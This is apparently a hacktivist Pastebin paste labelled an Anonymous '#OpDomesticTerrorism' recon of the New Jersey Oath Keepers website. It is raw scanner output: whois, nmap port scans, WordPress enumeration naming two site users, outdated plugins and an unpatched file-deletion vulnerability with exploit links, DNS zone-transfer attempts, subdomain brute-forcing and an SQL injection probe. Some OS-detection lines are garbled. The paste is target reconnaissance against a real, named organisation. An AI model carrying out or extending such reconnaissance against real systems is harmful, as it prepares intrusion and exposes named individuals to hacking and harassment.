SHARE
TWEET

Anonymous JTSEC #OpDomesticTerrorism JTSEC Full Recon #1

a guest Jun 30th, 2018 1,239 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #######################################################################################################################################
  2. Hostname    www.njoathkeepers.org       ISP     Linode, LLC
  3. Continent   North America       Flag    
  4. US
  5. Country     United States       Country Code    US
  6. Region  New Jersey      Local time  30 Jun 2018 07:32 EDT
  7. City    Newark      Postal Code     07175
  8. IP Address  192.155.88.60       Latitude    40.736
  9.             Longitude   -74.172
  10. #######################################################################################################################################
  11. HostIP:192.155.88.60
  12. HostName:njoathkeepers.org
  13.  
  14. Gathered Inet-whois information for 192.155.88.60
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum:        192.155.7.0 - 192.156.131.255
  19. netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  20. descr:          IPv4 address block not managed by the RIPE NCC
  21. remarks:        ------------------------------------------------------
  22. remarks:
  23. remarks:        You can find the whois server to query, or the
  24. remarks:        IANA registry to query on this web page:
  25. remarks:        http://www.iana.org/assignments/ipv4-address-space
  26. remarks:
  27. remarks:        You can access databases of other RIRs at:
  28. remarks:
  29. remarks:        AFRINIC (Africa)
  30. remarks:        http://www.afrinic.net/ whois.afrinic.net
  31. remarks:
  32. remarks:        APNIC (Asia Pacific)
  33. remarks:        http://www.apnic.net/ whois.apnic.net
  34. remarks:
  35. remarks:        ARIN (Northern America)
  36. remarks:        http://www.arin.net/  whois.arin.net
  37. remarks:
  38. remarks:        LACNIC (Latin America and the Carribean)
  39. remarks:        http://www.lacnic.net/ whois.lacnic.net
  40. remarks:
  41. remarks:        IANA IPV4 Recovered Address Space
  42. remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  43. remarks:
  44. remarks:        ------------------------------------------------------
  45. country:        EU # Country is really world wide
  46. admin-c:        IANA1-RIPE
  47. tech-c:         IANA1-RIPE
  48. status:         ALLOCATED UNSPECIFIED
  49. mnt-by:         RIPE-NCC-HM-MNT
  50. mnt-lower:      RIPE-NCC-HM-MNT
  51. mnt-routes:     RIPE-NCC-RPSL-MNT
  52. created:        2011-07-11T12:36:48Z
  53. last-modified:  2015-10-29T15:17:40Z
  54. source:         RIPE
  55.  
  56. role:           Internet Assigned Numbers Authority
  57. address:        see http://www.iana.org.
  58. admin-c:        IANA1-RIPE
  59. tech-c:         IANA1-RIPE
  60. nic-hdl:        IANA1-RIPE
  61. remarks:        For more information on IANA services
  62. remarks:        go to IANA web site at http://www.iana.org.
  63. mnt-by:         RIPE-NCC-MNT
  64. created:        1970-01-01T00:00:00Z
  65. last-modified:  2001-09-22T09:31:27Z
  66. source:         RIPE # Filtered
  67.  
  68. % This query was served by the RIPE Database Query Service version 1.91.2 (BLAARKOP)
  69.  
  70.  
  71.  
  72. Gathered Inic-whois information for njoathkeepers.org
  73. ---------------------------------------------------------------------------------------------------------------------------------------
  74. Domain Name: NJOATHKEEPERS.ORG
  75. Registry Domain ID: D169964607-LROR
  76. Registrar WHOIS Server: whois.domain.com
  77. Registrar URL: www.domain.com
  78. Updated Date: 2015-08-11T21:49:34Z
  79. Creation Date: 2013-10-17T12:03:14Z
  80. Registry Expiry Date: 2019-10-17T12:03:14Z
  81. Registrar Registration Expiration Date:
  82. Registrar: Domain.com, LLC
  83. Registrar IANA ID: 886
  84. Registrar Abuse Contact Email: compliance@domain-inc.net
  85. Registrar Abuse Contact Phone: +1.6022262389
  86. Reseller:
  87. ;�.o�rg/epp�Y���#cU@lient�Y���Tr�U@ansfe�������rProhib�U@ited
  88. Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
  89. Registrant Organization: Domain Privacy Group
  90. Registrant State/Province: MA
  91. Registrant Country: US
  92. Name Server: FNS1.DNSPARK.NET
  93. Name Server: FNS2.DNSPARK.NET
  94. DNSSEC: unsigned
  95. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  96. >>> Last update of WHOIS database: 2018-06-30T11:34:59Z <<<
  97. #######################################################################################################################################
  98. [i] Scanning Site: http://njoathkeepers.org
  99.  
  100.  
  101.  
  102. B A S I C   I N F O
  103. =======================================================================================================================================
  104.  
  105.  
  106. [+] Site Title: New Jersey Oath Keepers
  107. [+] IP address: 192.155.88.60
  108. [+] Web Server: nginx/1.8.1
  109. [+] CMS: WordPress
  110. [+] Cloudflare: Not Detected
  111. [+] Robots File: Found
  112.  
  113. -------------[ contents ]----------------  
  114. User-agent: *
  115. Disallow: /calendar/action~posterboard/
  116. Disallow: /calendar/action~agenda/
  117. Disallow: /calendar/action~oneday/
  118. Disallow: /calendar/action~month/
  119. Disallow: /calendar/action~week/
  120. Disallow: /calendar/action~stream/
  121. Disallow: /calendar/action~undefined/
  122. Disallow: /calendar/action~http:/
  123. Disallow: /calendar/action~default/
  124. Disallow: /calendar/action~poster/
  125. Disallow: /calendar/action~*/
  126. Disallow: /*controller=ai1ec_exporter_controller*
  127. Disallow: /*/action~*/
  128. -----------[end of contents]-------------
  129.  
  130.  
  131.  
  132. W H O I S   L O O K U P
  133. =======================================================================================================================================
  134.  
  135.     Domain Name: NJOATHKEEPERS.ORG
  136. Registry Domain ID: D169964607-LROR
  137. Registrar WHOIS Server: whois.domain.com
  138. Registrar URL: www.domain.com
  139. Updated Date: 2015-08-11T21:49:34Z
  140. Creation Date: 2013-10-17T12:03:14Z
  141. Registry Expiry Date: 2019-10-17T12:03:14Z
  142. Registrar Registration Expiration Date:
  143. Registrar: Domain.com, LLC
  144. Registrar IANA ID: 886
  145. Registrar Abuse Contact Email: compliance@domain-inc.net
  146. Registrar Abuse Contact Phone: +1.6022262389
  147. Reseller:
  148. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  149. Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
  150. Registrant Organization: Domain Privacy Group
  151. Registrant State/Province: MA
  152. Registrant Country: US
  153. Name Server: FNS1.DNSPARK.NET
  154. Name Server: FNS2.DNSPARK.NET
  155. DNSSEC: unsigned
  156. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  157. >>> Last update of WHOIS database: 2018-06-30T11:35:29Z <<<
  158.  
  159. For more information on Whois status codes, please visit https://icann.org/epp
  160.  
  161. Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
  162.  
  163. Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
  164.  
  165.  
  166.  
  167.  
  168. G E O  I P  L O O K  U P
  169. =======================================================================================================================================
  170.  
  171. [i] IP Address: 192.155.88.60
  172. [i] Country: US
  173. [i] State: New Jersey
  174. [i] City: Newark
  175. [i] Latitude: 40.735699
  176. [i] Longitude: -74.172401
  177.  
  178.  
  179.  
  180.  
  181. H T T P   H E A D E R S
  182. =======================================================================================================================================
  183.  
  184.  
  185. [i]  HTTP/1.1 301 Moved Permanently
  186. [i]  Server: nginx/1.8.1
  187. [i]  Date: Sat, 30 Jun 2018 11:36:32 GMT
  188. [i]  Content-Type: text/html; charset=UTF-8
  189. [i]  Connection: close
  190. [i]  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
  191. [i]  Location: http://www.njoathkeepers.org/
  192. [i]  HTTP/1.1 200 OK
  193. [i]  Server: nginx/1.8.1
  194. [i]  Date: Sat, 30 Jun 2018 11:36:34 GMT
  195. [i]  Content-Type: text/html; charset=UTF-8
  196. [i]  Connection: close
  197. [i]  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
  198. [i]  Link: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
  199. [i]  Link: <http://www.njoathkeepers.org/>; rel=shortlink
  200.  
  201.  
  202.  
  203.  
  204. D N S   L O O K U P
  205. =======================================================================================================================================
  206.  
  207. ;; Truncated, retrying in TCP mode.
  208. njoathkeepers.org.  3600    IN  TXT "v=spf1 include:servers.mcsv.net ?all"
  209. njoathkeepers.org.  3600    IN  NS  fns1.dnspark.net.
  210. njoathkeepers.org.  3600    IN  MX  0 mail.yourhostingaccount.com.
  211. njoathkeepers.org.  3600    IN  SOA fns1.dnspark.net. hostmaster.dnspark.net. 1477678945 14400 7200 1209600 3600
  212. njoathkeepers.org.  3600    IN  A   192.155.88.60
  213. njoathkeepers.org.  3600    IN  NS  fns2.dnspark.net.
  214.  
  215.  
  216.  
  217.  
  218. S U B N E T   C A L C U L A T I O N
  219. =======================================================================================================================================
  220.  
  221. Address       = 192.155.88.60
  222. Network       = 192.155.88.60 / 32
  223. Netmask       = 255.255.255.255
  224. Broadcast     = not needed on Point-to-Point links
  225. Wildcard Mask = 0.0.0.0
  226. Hosts Bits    = 0
  227. Max. Hosts    = 1   (2^0 - 0)
  228. Host Range    = { 192.155.88.60 - 192.155.88.60 }
  229.  
  230.  
  231.  
  232. N M A P   P O R T   S C A N
  233. =======================================================================================================================================
  234.  
  235.  
  236. Starting Nmap 7.01 ( https://nmap.org ) at 2018-06-30 11:36 UTC
  237. Nmap scan report for njoathkeepers.org (192.155.88.60)
  238. Host is up (0.0082s latency).
  239. rDNS record for 192.155.88.60: mail.nycpatriot.org
  240. PORT     STATE  SERVICE       VERSION
  241. 21/tcp   closed ftp
  242. 22/tcp   closed ssh
  243. 23/tcp   closed telnet
  244. 80/tcp   open   http          nginx 1.8.1
  245. 110/tcp  closed pop3
  246. 143/tcp  open   imap          Dovecot imapd
  247. 443/tcp  closed https
  248. 3389/tcp closed ms-wbt-server
  249.  
  250. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  251. Nmap done: 1 IP address (1 host up) scanned in 6.69 seconds
  252.  
  253.  
  254. #######################################################################################################################################
  255. [?] Enter the target: http://www.njoathkeepers.org/
  256. [!] IP Address : 192.155.88.60
  257. [!] Server: nginx/1.8.1
  258. [!] Powered By: PHP/5.5.38-1~dotdeb+7.1
  259. [+] Clickjacking protection is not in place.
  260. [!] CMS Detected : WordPress=
  261. [+] URL: http://www.njoathkeepers.org/
  262. [+] Started: Sat Jun 30 07:36:16 2018
  263.  
  264. [+] Interesting header: LINK: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
  265. [+] Interesting header: LINK: <http://www.njoathkeepers.org/>; rel=shortlink
  266. [+] Interesting header: SERVER: nginx/1.8.1
  267. [+] Interesting header: X-POWERED-BY: PHP/5.5.38-1~dotdeb+7.1
  268. [+] robots.txt available under: http://www.njoathkeepers.org/robots.txt   [HTTP 200]
  269. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*/action~*/   [HTTP 404]
  270. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*controller=ai1ec_exporter_controller*   [HTTP 404]
  271. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~*/   [HTTP 404]
  272. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~agenda/   [HTTP 200]
  273. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~default/   [HTTP 200]
  274. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~http:/   [HTTP 200]
  275. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~month/   [HTTP 200]
  276. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~oneday/   [HTTP 200]
  277. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~poster/   [HTTP 200]
  278. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~posterboard/   [HTTP 200]
  279. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~stream/   [HTTP 200]
  280. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~undefined/   [HTTP 200]
  281. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~week/   [HTTP 200]
  282. [+] XML-RPC Interface available under: http://www.njoathkeepers.org/xmlrpc.php   [HTTP 405]
  283. [+] API exposed: http://www.njoathkeepers.org/wp-json/   [HTTP 200]
  284. [!] 2 users exposed via API: http://www.njoathkeepers.org/wp-json/wp/v2/users
  285. +----+---------------+----------------------------------------------+
  286. | ID | Name          | URL                                          |
  287. +----+---------------+----------------------------------------------+
  288. | 1  | Adam Kosmin   | http://www.njoathkeepers.org/author/akosmin/ |
  289. | 2  | Edward Durfee | http://www.njoathkeepers.org/author/stepman/ |
  290. +----+---------------+----------------------------------------------+
  291. [+] Found an RSS Feed: http://www.njoathkeepers.org/feed/   [HTTP 200]
  292.  
  293. [+] Enumerating WordPress version ...
  294.  
  295. [+] WordPress version 4.9.6 (Released on 2018-05-17) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
  296. [!] 1 vulnerability identified from the version number
  297.  
  298. [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion (unpatched)
  299.     Reference: https://wpvulndb.com/vulnerabilities/9100
  300.     Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
  301.     Reference: http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
  302.  
  303. [+] WordPress theme in use: njoathkeepers - v3.0
  304.  
  305. [+] Name: njoathkeepers - v3.0
  306.  |  Location: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/
  307.  |  Readme: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/readme.txt
  308.  |  Style URL: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/style.css
  309.  |  Theme Name: njoathkeepers
  310.  |  Theme URI: http://www.dizzain.com/blog/freebies/free-wordpress-theme-drochilli/
  311.  |  Description: Minimalistic darken WordPress theme with two columns, left-sidebar, fluid width and widget-ready.
  312.  |  Author: Dizzain Inc.
  313.  |  Author URI: http://www.dizzain.com/
  314.  
  315. [+] Enumerating plugins from passive detection ...
  316.  | 6 plugins found:
  317.  
  318. [+] Name: all-in-one-event-calendar - v2.5.31
  319.  |  Last updated: 2018-06-26T21:04:00.000Z
  320.  |  Location: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/
  321.  |  Readme: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/readme.txt
  322. [!] The version is out of date, the latest version is 2.5.32
  323.  
  324. [+] Name: contact-form-7 - v5.0.2
  325.  |  Latest version: 5.0.2 (up to date)
  326.  |  Last updated: 2018-05-22T00:02:00.000Z
  327.  |  Location: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/
  328.  |  Readme: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/readme.txt
  329.  
  330. [+] Name: email-subscribers - v3.5.2
  331.  |  Latest version: 3.5.2 (up to date)
  332.  |  Last updated: 2018-06-18T11:25:00.000Z
  333.  |  Location: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/
  334.  |  Readme: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/readme.txt
  335.  |  Changelog: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/changelog.txt
  336.  
  337. [+] Name: login-sidebar-widget - v5.7.6
  338.  |  Latest version: 5.7.6 (up to date)
  339.  |  Last updated: 2018-06-05T17:24:00.000Z
  340.  |  Location: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/
  341.  |  Readme: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/readme.txt
  342.  
  343. [+] Name: pta-member-directory - v1.6.9
  344.  |  Latest version: 1.6.9 (up to date)
  345.  |  Last updated: 2017-09-18T01:17:00.000Z
  346.  |  Location: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/
  347.  |  Readme: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/readme.txt
  348.  
  349. [+] Name: taskfreak - v1.0.19
  350.  |  Latest version: 1.0.19 (up to date)
  351.  |  Last updated: 2016-08-11T06:51:00.000Z
  352.  |  Location: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/
  353.  |  Readme: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/readme.txt
  354.  
  355. [+] Finished: Sat Jun 30 07:37:27 2018
  356. [+] Elapsed time: 00:01:11
  357. [+] Requests made: 113
  358. [+] Memory used: 101.508 MB
  359. [-] Honeypot Probabilty: 50%
  360. ---------------------------------------------------------------------------------------------------------------------------------------
  361. [~] Trying to gather whois information for www.njoathkeepers.org
  362. [+] Whois information found
  363. Updated Date : 2015-08-11 21:49:34, 2018-06-10 20:09:45
  364. Status : clientTransferProhibited https://icann.org/epp#clientTransferProhibited, clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited, serverTransferProhibited https://icann.org/epp#serverTransferProhibited
  365. Name : Domain Privacy Service FBO Registrant.
  366. Dnssec : unsigned
  367. City : Burlington
  368. Expiration Date : 2019-10-17 12:03:14
  369. Address : 10 Corporate Drive
  370. Zipcode : 01803
  371. Domain Name : NJOATHKEEPERS.ORG
  372. Whois Server : whois.domain.com
  373. State : MA
  374. Registrar : Domain.com, LLC
  375. Referral Url : None
  376. Country : US
  377. Name Servers : FNS1.DNSPARK.NET, FNS2.DNSPARK.NET, fns1.dnspark.net, fns2.dnspark.net
  378. Org : Domain Privacy Group, Domain Privacy Service FBO Registrant.
  379. Creation Date : 2013-10-17 12:03:14
  380. Emails : compliance@domain-inc.net, njoathkeepers.org@domainprivacygroup.com, support@fatcow.com
  381. ---------------------------------------------------------------------------------------------------------------------------------------
  382. [+] Robots.txt retrieved
  383. User-agent: *
  384. Disallow: /wp-admin/
  385. Allow: /wp-admin/admin-ajax.php
  386. Disallow: /calendar/action~posterboard/
  387. Disallow: /calendar/action~agenda/
  388. Disallow: /calendar/action~oneday/
  389. Disallow: /calendar/action~month/
  390. Disallow: /calendar/action~week/
  391. Disallow: /calendar/action~stream/
  392. Disallow: /calendar/action~undefined/
  393. Disallow: /calendar/action~http:/
  394. Disallow: /calendar/action~default/
  395. Disallow: /calendar/action~poster/
  396. Disallow: /calendar/action~*/
  397. Disallow: /*controller=ai1ec_exporter_controller*
  398. Disallow: /*/action~*/
  399. ---------------------------------------------------------------------------------------------------------------------------------------
  400. PORT     STATE  SERVICE       VERSION
  401. 21/tcp   closed ftp
  402. 22/tcp   closed ssh
  403. 23/tcp   closed telnet
  404. 80/tcp   open   http          nginx 1.8.1
  405. 110/tcp  closed pop3
  406. 143/tcp  open   imap          Dovecot imapd
  407. 443/tcp  closed https
  408. 3389/tcp closed ms-wbt-server
  409. ---------------------------------------------------------------------------------------------------------------------------------------
  410.  
  411. [+] DNS Records
  412.  
  413. [+] Host Records (A)
  414. www.njoathkeepers.orgHTTP: (mail.nycpatriot.org) (192.155.88.60) AS63949 Linode, LLC United States
  415.  
  416. [+] TXT Records
  417.  
  418. [+] DNS Map: https://dnsdumpster.com/static/map/njoathkeepers.org.png
  419.  
  420. [>] Initiating 3 intel modules
  421. [>] Loading Alpha module (1/3)
  422. [>] Beta module deployed (2/3)
  423. [>] Gamma module initiated (3/3)
  424.  
  425.  
  426. [+] Emails found:
  427. ---------------------------------------------------------------------------------------------------------------------------------------
  428. pixel-1530358688505397-web-@www.njoathkeepers.org
  429. pixel-153035869246569-web-@www.njoathkeepers.org
  430. No hosts found
  431. [+] Virtual hosts:
  432. ---------------------------------------------------------------------------------------------------------------------------------------
  433. [~] Crawling the target for fuzzable URLs
  434. [+] Found 2 fuzzable URLs
  435. http://www.njoathkeepers.org//webcal://www.njoathkeepers.org/?plugin=all-in-one-event-calendar&controller=ai1ec_exporter_controller&action=export_events&no_html=true
  436. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
  437. [-] None of parameters is vulnerable to SQL injection
  438. #######################################################################################################################################
  439. Server:     10.211.254.254
  440. Address:    10.211.254.254#53
  441.  
  442. Non-authoritative answer:
  443. Name:   njoathkeepers.org
  444. Address: 192.155.88.60
  445.  
  446. njoathkeepers.org has address 192.155.88.60
  447. njoathkeepers.org mail is handled by 0 mail.yourhostingaccount.com.
  448. #######################################################################################################################################
  449. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  450.  
  451. [+] Target is njoathkeepers.org
  452. [+] Loading modules.
  453. [+] Following modules are loaded:
  454. [x] [1] ping:icmp_ping  -  ICMP echo discovery module
  455. [x] [2] ping:tcp_ping  -  TCP-based ping discovery module
  456. [x] [3] ping:udp_ping  -  UDP-based ping discovery module
  457. [x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
  458. [x] [5] infogather:portscan  -  TCP and UDP PortScanner
  459. [x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
  460. [x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
  461. [x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
  462. [x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
  463. [x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
  464. [x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
  465. [x] [12] fingerprint:smb  -  SMB fingerprinting module
  466. [x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
  467. [+] 13 modules registered
  468. [+] Initializing scan engine
  469. [+] Running scan engine
  470. [-] ping:tcp_ping module: no closed/open TCP ports known on 192.155.88.60. Module test failed
  471. [-] ping:udp_ping module: no closed/open UDP ports known on 192.155.88.60. Module test failed
  472. [-] No distance calculation. 192.155.88.60 appears to be dead or no ports known
  473. [+] Host: 192.155.88.60 is up (Guess probability: 50%)
  474. [+] Target: 192.155.88.60 is alive. Round-Trip Time: 0.49145 sec
  475. [+] Selected safe Round-Trip Time value is: 0.98290 sec
  476. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  477. [-] fingerprint:smb need either TCP port 139 or 445 to run
  478. [+] Primary guess:
  479. [+] Host 192.155.88.60 Running OS: ��4��U (Guess probability: 100%)
  480. [+] Other guesses:
  481. [+] Host 192.155.88.60 Running OS: 0:6��U (Guess probability: 100%)
  482. [+] Host 192.155.88.60 Running OS: 0:6��U (Guess probability: 100%)
  483. [+] Host 192.155.88.60 Running OS: 0:6��U (Guess probability: 100%)
  484. [+] Host 192.155.88.60 Running OS: ��4��U (Guess probability: 100%)
  485. [+] Host 192.155.88.60 Running OS: 0:6��U (Guess probability: 100%)
  486. [+] Host 192.155.88.60 Running OS: ��4��U (Guess probability: 100%)
  487. [+] Host 192.155.88.60 Running OS: 0:6��U (Guess probability: 100%)
  488. [+] Host 192.155.88.60 Running OS: 0:6��U (Guess probability: 100%)
  489. [+] Host 192.155.88.60 Running OS: 0:6��U (Guess probability: 100%)
  490. [+] Cleaning up scan engine
  491. [+] Modules deinitialized
  492. [+] Execution completed.
  493. #######################################################################################################################################
  494. Domain Name: NJOATHKEEPERS.ORG
  495. Registry Domain ID: D169964607-LROR
  496. Registrar WHOIS Server: whois.domain.com
  497. Registrar URL: www.domain.com
  498. Updated Date: 2015-08-11T21:49:34Z
  499. Creation Date: 2013-10-17T12:03:14Z
  500. Registry Expiry Date: 2019-10-17T12:03:14Z
  501. Registrar Registration Expiration Date:
  502. Registrar: Domain.com, LLC
  503. Registrar IANA ID: 886
  504. Registrar Abuse Contact Email: compliance@domain-inc.net
  505. Registrar Abuse Contact Phone: +1.6022262389
  506. Reseller:
  507. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  508. Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
  509. Registrant Organization: Domain Privacy Group
  510. Registrant State/Province: MA
  511. Registrant Country: US
  512. Name Server: FNS1.DNSPARK.NET
  513. Name Server: FNS2.DNSPARK.NET
  514. DNSSEC: unsigned
  515. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  516. >>> Last update of WHOIS database: 2018-06-30T11:43:50Z <<<
  517.  
  518. For more information on Whois status codes, please visit https://icann.org/epp
  519.  
  520. Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
  521.  
  522. Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
  523. #######################################################################################################################################
  524. ; <<>> DiG 9.11.3-2-Debian <<>> -x njoathkeepers.org
  525. ;; global options: +cmd
  526. ;; Got answer:
  527. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7496
  528. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  529.  
  530. ;; OPT PSEUDOSECTION:
  531. ; EDNS: version: 0, flags:; udp: 512
  532. ;; QUESTION SECTION:
  533. ;org.njoathkeepers.in-addr.arpa.    IN  PTR
  534.  
  535. ;; AUTHORITY SECTION:
  536. in-addr.arpa.       3053    IN  SOA b.in-addr-servers.arpa. nstld.iana.org. 2018013437 1800 900 604800 3600
  537.  
  538. ;; Query time: 400 msec
  539. ;; SERVER: 10.211.254.254#53(10.211.254.254)
  540. ;; WHEN: Sat Jun 30 07:44:50 EDT 2018
  541. ;; MSG SIZE  rcvd: 127
  542.  
  543. dnsenum VERSION:1.2.4
  544.  
  545. -----   njoathkeepers.org   -----
  546.  
  547.  
  548. Host's addresses:
  549. __________________
  550.  
  551. njoathkeepers.org.                       3041     IN    A        192.155.88.60
  552.  
  553.  
  554. Name Servers:
  555. ______________
  556.  
  557. fns1.dnspark.net.                        1909     IN    A        66.55.82.13
  558. fns2.dnspark.net.                        10       IN    A        192.184.90.32
  559.  
  560.  
  561. Mail (MX) Servers:
  562. ___________________
  563.  
  564. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.54
  565. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.50
  566. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.55
  567. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.57
  568. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.53
  569. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.56
  570. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.52
  571. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.51
  572. mail.yourhostingaccount.com.             3055     IN    A        65.254.254.58
  573.  
  574.  
  575. Trying Zone Transfers and getting Bind Versions:
  576. _________________________________________________
  577.  
  578.  
  579. Trying Zone Transfer for njoathkeepers.org on fns1.dnspark.net ...
  580.  
  581. Trying Zone Transfer for njoathkeepers.org on fns2.dnspark.net ...
  582.  
  583. brute force file not specified, bay.
  584. #######################################################################################################################################
  585. [-] Enumerating subdomains now for njoathkeepers.org
  586. [-] verbosity is enabled, will show the subdomains results in realtime
  587. [-] Searching now in Baidu..
  588. [-] Searching now in Yahoo..
  589. [-] Searching now in Google..
  590. [-] Searching now in Bing..
  591. [-] Searching now in Ask..
  592. [-] Searching now in Netcraft..
  593. [-] Searching now in DNSdumpster..
  594. [-] Searching now in Virustotal..
  595. [-] Searching now in ThreatCrowd..
  596. [-] Searching now in SSL Certificates..
  597. [-] Searching now in PassiveDNS..
  598. Virustotal: www.njoathkeepers.org
  599. Yahoo: www.njoathkeepers.org
  600. [-] Saving results to file: /usr/share/sniper/loot/njoathkeepers.org/domains/domains-njoathkeepers.org.txt
  601. [-] Total Unique Subdomains Found: 1
  602. www.njoathkeepers.org
  603. #######################################################################################################################################
  604.                            __
  605.   ____ _____ ___  ______ _/ /_____  ____  ___
  606.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  607. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  608. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  609.         /_/  discover v0.5.0 - by @michenriksen
  610.  
  611. Identifying nameservers for njoathkeepers.org... Done
  612. Using nameservers:
  613.  
  614.  - 66.55.82.13
  615.  - 192.184.90.32
  616.  
  617. Checking for wildcard DNS... Done
  618.  
  619. Running collector: PassiveTotal... Skipped
  620.  -> Key 'passivetotal_key' has not been set
  621. Running collector: Certificate Search... Done (0 hosts)
  622. Running collector: DNSDB... Done (1 host)
  623. Running collector: Riddler... Skipped
  624.  -> Key 'riddler_username' has not been set
  625. Running collector: Threat Crowd... Done (0 hosts)
  626. Running collector: Dictionary... Done (27 hosts)
  627. Running collector: Censys... Skipped
  628.  -> Key 'censys_secret' has not been set
  629. Running collector: PTRArchive... Error
  630.  -> PTRArchive returned unexpected response code: 404
  631. Running collector: Wayback Machine... Done (2 hosts)
  632. Running collector: PublicWWW... Done (0 hosts)
